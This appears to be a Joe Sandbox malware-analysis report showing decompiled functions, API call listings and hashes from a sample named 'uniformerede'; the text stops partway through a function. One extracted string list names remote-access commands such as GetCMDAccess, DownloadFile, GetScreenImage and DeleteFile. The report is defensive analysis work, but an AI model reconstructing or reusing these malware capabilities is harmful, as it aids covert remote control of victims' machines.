                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402e66
                                                                                                                                                                                                                            0x00402e68
                                                                                                                                                                                                                            0x00402e74
                                                                                                                                                                                                                            0x00402e88
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402e98
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402e98
                                                                                                                                                                                                                            0x00402e88
                                                                                                                                                                                                                            0x00402e76
                                                                                                                                                                                                                            0x00402e76
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402e68
                                                                                                                                                                                                                            0x00402e3e

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402DF8
                                                                                                                                                                                                                            • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402E1C
                                                                                                                                                                                                                            • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402E38
                                                                                                                                                                                                                            • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000), ref: 00402E59
                                                                                                                                                                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00402E82
                                                                                                                                                                                                                            • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00402E90
                                                                                                                                                                                                                            • GetStdHandle.KERNEL32(000000F5), ref: 00402ECB
                                                                                                                                                                                                                            • GetFileType.KERNEL32(?,000000F5), ref: 00402EE1
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,000000F5), ref: 00402EFC
                                                                                                                                                                                                                            • GetLastError.KERNEL32(000000F5), ref: 00402F14
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1694776339-0
                                                                                                                                                                                                                            • Opcode ID: 8861dfc536feb275602d3633a0ce4d7dcd0f803c1f99ce0a386a22b5fd57de5a
                                                                                                                                                                                                                            • Instruction ID: 9aa9312da4e91c771af0b4e33a38407941ada986436eec9a0907e2913daab745
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8861dfc536feb275602d3633a0ce4d7dcd0f803c1f99ce0a386a22b5fd57de5a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 31418C30140701AAE730AF24CA4DB6775A5AF00754F208E3FE5A6BA6E0D7FD9841979D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00473930(CHAR* __eax, CHAR* __edx) {
                                                                                                                                                                                                                            				void _v40;
                                                                                                                                                                                                                            				void* _v44;
                                                                                                                                                                                                                            				long _v48;
                                                                                                                                                                                                                            				char _v52;
                                                                                                                                                                                                                            				CHAR* _v56;
                                                                                                                                                                                                                            				long _t60;
                                                                                                                                                                                                                            				void* _t64;
                                                                                                                                                                                                                            				void* _t65;
                                                                                                                                                                                                                            				void* _t66;
                                                                                                                                                                                                                            				void* _t67;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_v56 = __edx;
                                                                                                                                                                                                                            				_v52 = 0;
                                                                                                                                                                                                                            				_t66 = CreateFileA(__eax, 0x80000000, 1, 0, 3, 0x80, 0);
                                                                                                                                                                                                                            				if(_t66 > 0) {
                                                                                                                                                                                                                            					ReadFile(_t66,  &_v40, 0x16,  &_v48, 0);
                                                                                                                                                                                                                            					SetFilePointer(_t66, 0, 0, 0);
                                                                                                                                                                                                                            					_t65 = E0040275C(0x26);
                                                                                                                                                                                                                            					_t64 = E0040275C(0x22);
                                                                                                                                                                                                                            					_t59 = _t65;
                                                                                                                                                                                                                            					ReadFile(_t66, _t65, 0x26,  &_v48, 0);
                                                                                                                                                                                                                            					E004029DC(_t59, 0x14, _t64);
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t64 + 6)) =  *((intOrPtr*)(_t65 + 6));
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t64 + 0xa)) =  *((intOrPtr*)(_t65 + 0xa));
                                                                                                                                                                                                                            					 *(_t64 + 0xe) =  *(_t65 + 0xe);
                                                                                                                                                                                                                            					 *((short*)(_t64 + 0x12)) = 1;
                                                                                                                                                                                                                            					_t60 =  *(_t65 + 0xe);
                                                                                                                                                                                                                            					_v44 = E0040275C(_t60);
                                                                                                                                                                                                                            					SetFilePointer(_t66,  *(_t65 + 0x12), 0, 0);
                                                                                                                                                                                                                            					ReadFile(_t66, _v44, _t60,  &_v48, 0);
                                                                                                                                                                                                                            					CloseHandle(_t66);
                                                                                                                                                                                                                            					_t67 = BeginUpdateResourceA(_v56, 0);
                                                                                                                                                                                                                            					if(_t67 > 0) {
                                                                                                                                                                                                                            						UpdateResourceA(_t67, 3, 1, 0, _v44, _t60);
                                                                                                                                                                                                                            						EndUpdateResourceA(_t67, 0);
                                                                                                                                                                                                                            						_v52 = 1;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					E0040277C(_v44);
                                                                                                                                                                                                                            					E0040277C(_t64);
                                                                                                                                                                                                                            					E0040277C(_t65);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _v52;
                                                                                                                                                                                                                            			}














                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00473952
                                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,?,00000016,?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00473970
                                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000016,?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0047397C
                                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000026,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00000016,?,00000000,00000000,80000000), ref: 004739A6
                                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000026,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00000016), ref: 004739E8
                                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,?,?,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000026,?,00000000,00000000,00000000), ref: 004739FB
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000026,?,00000000,00000000), ref: 00473A01
                                                                                                                                                                                                                            • BeginUpdateResourceA.KERNEL32 ref: 00473A0D
                                                                                                                                                                                                                            • UpdateResourceA.KERNEL32 ref: 00473A25
                                                                                                                                                                                                                            • EndUpdateResourceA.KERNEL32 ref: 00473A2D
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: File$ReadResourceUpdate$Pointer$BeginCloseCreateHandle
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2954177348-0
                                                                                                                                                                                                                            • Opcode ID: b3c417beb733bcad9e80f08033d85762bfb7f3f1641e04f9420e66906a9e60b8
                                                                                                                                                                                                                            • Instruction ID: bc58bece930a9ee3c191066ba21d3152ea947465ec18ce8fe9039474e398f891
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b3c417beb733bcad9e80f08033d85762bfb7f3f1641e04f9420e66906a9e60b8
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A33147707443057EE210EB598C46F6BB7DC9F44704F00442EBA59EB2C2D6B9F904976E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00455F20(intOrPtr _a4) {
                                                                                                                                                                                                                            				intOrPtr _t27;
                                                                                                                                                                                                                            				struct HMENU__* _t48;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t27 =  *((intOrPtr*)(_a4 - 4));
                                                                                                                                                                                                                            				if( *((char*)(_t27 + 0x229)) != 0) {
                                                                                                                                                                                                                            					_t27 =  *((intOrPtr*)(_a4 - 4));
                                                                                                                                                                                                                            					if(( *(_t27 + 0x228) & 0x00000001) != 0) {
                                                                                                                                                                                                                            						_t27 =  *((intOrPtr*)(_a4 - 4));
                                                                                                                                                                                                                            						if( *((char*)(_t27 + 0x22f)) != 1) {
                                                                                                                                                                                                                            							_t48 = GetSystemMenu(E00441704( *((intOrPtr*)(_a4 - 4))), 0);
                                                                                                                                                                                                                            							if( *((char*)( *((intOrPtr*)(_a4 - 4)) + 0x229)) == 3) {
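                                                                                                                                                                                                                            								DeleteMenu(_t48, 0xf130, 0); // SC_TASKLIST, MF_BYCOMMAND
                                                                                                                                                                                                                            								DeleteMenu(_t48, 7, 0x400); // item at position 7, MF_BYPOSITION
                                                                                                                                                                                                                            								DeleteMenu(_t48, 5, 0x400); // item at position 5, MF_BYPOSITION
                                                                                                                                                                                                                            								DeleteMenu(_t48, 0xf030, 0); // SC_MAXIMIZE
                                                                                                                                                                                                                            								DeleteMenu(_t48, 0xf020, 0); // SC_MINIMIZE
                                                                                                                                                                                                                            								DeleteMenu(_t48, 0xf000, 0); // SC_SIZE
                                                                                                                                                                                                                            								return DeleteMenu(_t48, 0xf120, 0); // SC_RESTORE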
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							if(( *( *((intOrPtr*)(_a4 - 4)) + 0x228) & 0x00000002) == 0) {
                                                                                                                                                                                                                            								EnableMenuItem(_t48, 0xf020, 1); // gray out SC_MINIMIZE (MF_GRAYED)
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_t27 =  *((intOrPtr*)(_a4 - 4));
                                                                                                                                                                                                                            							if(( *(_t27 + 0x228) & 0x00000004) == 0) {
                                                                                                                                                                                                                            								return EnableMenuItem(_t48, 0xf030, 1);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t27;
                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetSystemMenu.USER32(00000000,00000000), ref: 00455F6B
                                                                                                                                                                                                                            • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00455F89
                                                                                                                                                                                                                            • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00455F96
                                                                                                                                                                                                                            • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00455FA3
                                                                                                                                                                                                                            • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00455FB0
                                                                                                                                                                                                                            • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00455FBD
                                                                                                                                                                                                                            • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 00455FCA
                                                                                                                                                                                                                            • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 00455FD7
                                                                                                                                                                                                                            • EnableMenuItem.USER32 ref: 00455FF5
                                                                                                                                                                                                                            • EnableMenuItem.USER32 ref: 00456011
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Menu$Delete$EnableItem$System
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3985193851-0
                                                                                                                                                                                                                            • Opcode ID: 46a722b8eeeea243d78a8bad53259dfb526ef96efbc8dad51e559871ae0294e4
                                                                                                                                                                                                                            • Instruction ID: b5346b1c8bd95bffcca62109fe31ea1f8cc395b33158847c9b815f432f914529
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 46a722b8eeeea243d78a8bad53259dfb526ef96efbc8dad51e559871ae0294e4
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 91215E707C53047AE320DB64CD8EFA97AD95B14B1AF1450A5BA447F6D3C6BCFA80861C
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 67%
                                                                                                                                                                                                                            			E004214B8(void* __eax, void* __ebx, void* __edi, void* __esi) {
                                                                                                                                                                                                                            				char _v5;
                                                                                                                                                                                                                            				intOrPtr* _v12;
                                                                                                                                                                                                                            				long _v16;
                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                            				char _v24;
                                                                                                                                                                                                                            				long _t22;
                                                                                                                                                                                                                            				char _t29;
                                                                                                                                                                                                                            				void* _t53;
                                                                                                                                                                                                                            				intOrPtr _t61;
                                                                                                                                                                                                                            				intOrPtr* _t62;
                                                                                                                                                                                                                            				intOrPtr _t63;
                                                                                                                                                                                                                            				intOrPtr _t66;
                                                                                                                                                                                                                            				intOrPtr _t67;
                                                                                                                                                                                                                            				void* _t72;
                                                                                                                                                                                                                            				void* _t73;
                                                                                                                                                                                                                            				intOrPtr _t74;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t72 = _t73;
                                                                                                                                                                                                                            				_t74 = _t73 + 0xffffffec;
                                                                                                                                                                                                                            				_push(__esi);
                                                                                                                                                                                                                            				_push(__edi);
                                                                                                                                                                                                                            				_t53 = __eax;
                                                                                                                                                                                                                            				_t22 = GetCurrentThreadId();
                                                                                                                                                                                                                            				_t62 =  *0x49de40; // 0x49e034
                                                                                                                                                                                                                            				if(_t22 !=  *_t62) {
                                                                                                                                                                                                                            					_v24 = GetCurrentThreadId();
                                                                                                                                                                                                                            					_v20 = 0;
                                                                                                                                                                                                                            					_t61 =  *0x49dbc8; // 0x41744c
                                                                                                                                                                                                                            					E0040D23C(_t53, _t61, 1, __edi, __esi, 0,  &_v24);
                                                                                                                                                                                                                            					E00404378();
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				if(_t53 <= 0) {
                                                                                                                                                                                                                            					E0042146C();
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					E00421478(_t53);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_v16 = 0;
                                                                                                                                                                                                                            				_push(0x49e86c);
                                                                                                                                                                                                                            				L00406FE0();
                                                                                                                                                                                                                            				_push(_t72);
                                                                                                                                                                                                                            				_push(0x421646);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t74;
                                                                                                                                                                                                                            				_v16 = InterlockedExchange( &E0049B5C4, _v16);
                                                                                                                                                                                                                            				_push(_t72);
                                                                                                                                                                                                                            				_push(0x421627);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t74;
                                                                                                                                                                                                                            				if(_v16 == 0 ||  *((intOrPtr*)(_v16 + 8)) <= 0) {
                                                                                                                                                                                                                            					_t29 = 0;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t29 = 1;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_v5 = _t29;
                                                                                                                                                                                                                            				if(_v5 == 0) {
                                                                                                                                                                                                                            					L14:
                                                                                                                                                                                                                            					_pop(_t63);
                                                                                                                                                                                                                            					 *[fs:eax] = _t63;
                                                                                                                                                                                                                            					_push(E0042162E);
                                                                                                                                                                                                                            					return E00403BEC(_v16);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					if( *((intOrPtr*)(_v16 + 8)) > 0) {
                                                                                                                                                                                                                            						_v12 = E0041AC6C(_v16, 0);
                                                                                                                                                                                                                            						E0041AB5C(_v16, 0);
                                                                                                                                                                                                                            						L004071A0();
                                                                                                                                                                                                                            						 *[fs:eax] = _t74;
                                                                                                                                                                                                                            						 *[fs:eax] = _t74;
                                                                                                                                                                                                                            						 *((intOrPtr*)( *_v12 + 8))( *[fs:eax], _t72,  *[fs:eax], 0x4215f1, _t72, 0x49e86c);
                                                                                                                                                                                                                            						_pop(_t66);
                                                                                                                                                                                                                            						 *[fs:eax] = _t66;
                                                                                                                                                                                                                            						_t67 = 0x4215c2;
                                                                                                                                                                                                                            						 *[fs:eax] = _t67;
                                                                                                                                                                                                                            						_push(E004215F8);
                                                                                                                                                                                                                            						_push(0x49e86c);
                                                                                                                                                                                                                            						L00406FE0();
                                                                                                                                                                                                                            						return 0;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						goto L14;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}



















                                                                                                                                                                                                                            0x00421613
                                                                                                                                                                                                                            0x00421616
                                                                                                                                                                                                                            0x00421619
                                                                                                                                                                                                                            0x00421626
                                                                                                                                                                                                                            0x0042156b
                                                                                                                                                                                                                            0x0042160b
                                                                                                                                                                                                                            0x0042157a
                                                                                                                                                                                                                            0x00421582
                                                                                                                                                                                                                            0x0042158c
                                                                                                                                                                                                                            0x0042159c
                                                                                                                                                                                                                            0x004215aa
                                                                                                                                                                                                                            0x004215b5
                                                                                                                                                                                                                            0x004215ba
                                                                                                                                                                                                                            0x004215bd
                                                                                                                                                                                                                            0x004215db
                                                                                                                                                                                                                            0x004215de
                                                                                                                                                                                                                            0x004215e1
                                                                                                                                                                                                                            0x004215e6
                                                                                                                                                                                                                            0x004215eb
                                                                                                                                                                                                                            0x004215f0
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0042160b

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 004214C3
                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 004214D2
                                                                                                                                                                                                                              • Part of subcall function 0042146C: ResetEvent.KERNEL32(00000220,0042150D,?,?,00000000), ref: 00421472
                                                                                                                                                                                                                            • RtlEnterCriticalSection.KERNEL32(0049E86C,?,?,00000000), ref: 00421517
                                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(0049B5C4,?), ref: 00421533
                                                                                                                                                                                                                            • RtlLeaveCriticalSection.KERNEL32(0049E86C,00000000,00421627,?,00000000,00421646,?,0049E86C,?,?,00000000), ref: 0042158C
                                                                                                                                                                                                                            • RtlEnterCriticalSection.KERNEL32(0049E86C,004215F8,00421627,?,00000000,00421646,?,0049E86C,?,?,00000000), ref: 004215EB
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CriticalSection$CurrentEnterThread$EventExchangeInterlockedLeaveReset
                                                                                                                                                                                                                            • String ID: 4I$LtA
                                                                                                                                                                                                                            • API String ID: 2189153385-4143330910
                                                                                                                                                                                                                            • Opcode ID: 9df671befd0559164bdf9a2b2f9f914a41e4678e38533ce31647a3c6e0478cce
                                                                                                                                                                                                                            • Instruction ID: c7144f3b078a98dbb88dc3215a2fca8a3d1431468ba3915c2d0e15c961d82a4d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9df671befd0559164bdf9a2b2f9f914a41e4678e38533ce31647a3c6e0478cce
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DA31EA30B04204BFD711DF65E852A6D7BF8EB59704F9184B7F401932A1D77D9D40CA29
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateThread
                                                                                                                                                                                                                            • String ID: CheckMe$DeleteFile$DownloadFile$GetCMDAccess$GetScreenImage$ListDir$ListDisk
                                                                                                                                                                                                                            • API String ID: 2422867632-2040281516
                                                                                                                                                                                                                            • Opcode ID: b8b8442999d8b82ff34f09aae518beeab9395ee6e2a7bec9604896c991f417c9
                                                                                                                                                                                                                            • Instruction ID: cc4d067afddf7cdfb89c5fbb3b31213d9db14bacd25ac7606a572a3bc3506bde
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b8b8442999d8b82ff34f09aae518beeab9395ee6e2a7bec9604896c991f417c9
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D131CF30710A049BCF12EBA5DC46A1A7BB4EF89714B70867BF600D77A1CA3CAD09871C
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0040D058(void* __edx, void* __edi, void* __fp0) {
                                                                                                                                                                                                                            				void _v1024;
                                                                                                                                                                                                                            				char _v1088;
                                                                                                                                                                                                                            				long _v1092;
                                                                                                                                                                                                                            				void* _t12;
                                                                                                                                                                                                                            				char* _t14;
                                                                                                                                                                                                                            				intOrPtr _t16;
                                                                                                                                                                                                                            				intOrPtr _t18;
                                                                                                                                                                                                                            				intOrPtr _t24;
                                                                                                                                                                                                                            				long _t32;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				E0040CED0(_t12,  &_v1024, __edx, __fp0, 0x400);
                                                                                                                                                                                                                            				_t14 =  *0x49dc84; // 0x49e04c
                                                                                                                                                                                                                            				if( *_t14 == 0) {
                                                                                                                                                                                                                            					_t16 =  *0x49d864; // 0x407db4
                                                                                                                                                                                                                            					_t9 = _t16 + 4; // 0xffd2
                                                                                                                                                                                                                            					_t18 =  *0x49e668; // 0x400000
                                                                                                                                                                                                                            					LoadStringA(E00405FDC(_t18),  *_t9,  &_v1088, 0x40);
                                                                                                                                                                                                                            					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t24 =  *0x49d8f8; // 0x49e21c
                                                                                                                                                                                                                            				E004028C4(E00402FCC(_t24));
                                                                                                                                                                                                                            				CharToOemA( &_v1024,  &_v1024);
                                                                                                                                                                                                                            				_t32 = E00409F88( &_v1024, __edi);
                                                                                                                                                                                                                            				WriteFile(GetStdHandle(0xfffffff4),  &_v1024, _t32,  &_v1092, 0);
                                                                                                                                                                                                                            				return WriteFile(GetStdHandle(0xfffffff4), 0x40d11c, 2,  &_v1092, 0);
                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 0040CED0: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040CEED
                                                                                                                                                                                                                              • Part of subcall function 0040CED0: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040CF11
                                                                                                                                                                                                                              • Part of subcall function 0040CED0: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040CF2C
                                                                                                                                                                                                                              • Part of subcall function 0040CED0: LoadStringA.USER32 ref: 0040CFC2
                                                                                                                                                                                                                            • CharToOemA.USER32 ref: 0040D08F
                                                                                                                                                                                                                            • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0040D0AC
                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040D0B2
                                                                                                                                                                                                                            • GetStdHandle.KERNEL32(000000F4,0040D11C,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040D0C7
                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,000000F4,0040D11C,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040D0CD
                                                                                                                                                                                                                            • LoadStringA.USER32 ref: 0040D0EF
                                                                                                                                                                                                                            • MessageBoxA.USER32 ref: 0040D105
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                                                                                                                                                            • String ID: LI
                                                                                                                                                                                                                            • API String ID: 185507032-1163166679
                                                                                                                                                                                                                            • Opcode ID: 5032c406810ebafbb8b0f00c750bd69e21efc636ecabd08e4cda58801eaa7325
                                                                                                                                                                                                                            • Instruction ID: 7d08aee67cafa4939384a0f732e453422e0e0597bbcbc481209cf698103cc48d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5032c406810ebafbb8b0f00c750bd69e21efc636ecabd08e4cda58801eaa7325
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AC119EB2948205BAD200F7A5CC86F8F77ECAB54304F40463BB754E60E2DA78E844876B
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0043AB98(intOrPtr* __eax, int __ecx, int __edx) {
                                                                                                                                                                                                                            				char _t62;
                                                                                                                                                                                                                            				signed int _t64;
                                                                                                                                                                                                                            				signed int _t65;
